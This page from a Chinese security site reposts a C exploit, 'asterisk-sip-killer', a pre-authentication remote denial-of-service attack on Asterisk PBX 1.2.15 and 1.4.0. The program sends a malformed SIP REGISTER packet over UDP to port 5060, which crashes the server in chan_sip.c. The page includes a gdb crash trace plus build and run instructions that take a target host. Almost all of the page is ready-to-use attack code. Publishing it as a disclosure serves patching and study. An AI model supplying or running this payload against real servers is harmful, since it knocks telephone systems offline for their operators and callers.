首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Asterisk <= 1.2.15 / 1.4.0 pre-auth Remote Denial of Service Exploit 来源：www.vfocus.net 作者：vfocus 发布时间：2007-03-06   /* this will cause asterisk to segfault, the bug that this exploits has been patched in release 1.2.16  & 1.4.1 CLI> Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1082719152 (LWP 2510)] register_verify (p=0x81cf600, sin=0x4088e750, req=0x4088e760, uri=0x0)     at chan_sip.c:8257 8257            while (*t && *t > ' ' && *t != ';') (gdb) build: gcc -o asterisk-sip-killer asterisk-sip-killer.c run: ./asterisk-sip-killer -h <targethost> */ #include <stdio.h> #include <string.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <netdb.h> #include <netinet/tcp.h> #define SIP_UDP_PORT 5060 struct udp_session { int sd; struct sockaddr_in saddr; }; int make_udp(struct udp_session *p, char *remotehost, int port) { int sd; int ret; struct sockaddr_in saddr; struct hostent *he; sd = socket(AF_INET,SOCK_DGRAM,0); if (sd == -1) { printf("error making socket\n"); return -1; } he = gethostbyname(remotehost); saddr.sin_family = AF_INET; saddr.sin_port = htons(port); saddr.sin_addr.s_addr = inet_addr(remotehost); memset(&(saddr.sin_zero), '\0', 8); p->sd = sd; memcpy(&p->saddr,&saddr,sizeof(struct sockaddr_in)); printf("udp socket ready\n"); return 0; } void kill_asterisk(struct udp_session *sess) { int ret; char *p = "REGISTER              \r\n" "Via: SIP/2.0/UDP 192.168.204.130:5060;branch=z9hG4bK1d97e14f\r\n" "Max-Forwards: 70\r\n" "From: <sip:666@192.168.204.130>;tag=as253946cf\r\n" "To: <sip:100@192.168.204.130>\r\n" "Call-ID: 7e64a49e5cf018231228938050e43d3b@127.0.0.1\r\n" "CSeq: 104 REGISTER\r\n" "User-Agent: Asterisk PBX\r\n" "Expires: 120\r\n" "Contact: <sip:666@192.168.204.130>\r\n" "Event: registration\r\n" "Content-Length: 0\r\n"; ret = sendto(sess->sd, p, strlen(p), 0,        (struct sockaddr *)&sess->saddr,        sizeof(struct sockaddr)); if (ret) { printf("You may have well shutdown a asterisk server\n"); } else { printf("there was a issue sending the request\n"); return; } return; } int main(int argc, char **argv) { int i = 0; char *r_host = NULL; struct udp_session *connection_out; for (i=0;i<argc;i++) { if (!(strcmp(argv[i],"-h"))) {                         printf("it looks like you want a host entry\n");                         r_host = argv[i+1];                         printf("r_host: %s\n", r_host);                 }         } if (!r_host) { printf("umm you forgot the -h <host> option!\n"); return 0; } if (!(connection_out = (struct udp_session *)malloc(sizeof(struct udp_session)))) { printf("malloc failed your computer sucks\n"); return 0; } make_udp(connection_out, r_host, SIP_UDP_PORT); kill_asterisk(connection_out); free(connection_out); return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·WebMod 0.48 (Content-Length) R ·AJ Auction Pro All Versions (s ·PHP 4 Userland ZVAL Reference ·AJDating 1.0 (view_profile.php ·phpMyFAQ <= 1.6.7 Remote SQL I ·AJ Forum 1.0 (topic_title.php) ·DivX Web Player 1.3.0 (npdivx3 ·Konqueror 3.5.5 (JavaScript Re ·Snort 2.6.1 DCE/RPC Preprocess ·Links Management Application 1 ·madwifi <= 0.9.2.1 WPA/RSN IE ·PHP 4 unserialize() ZVAL Refer   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved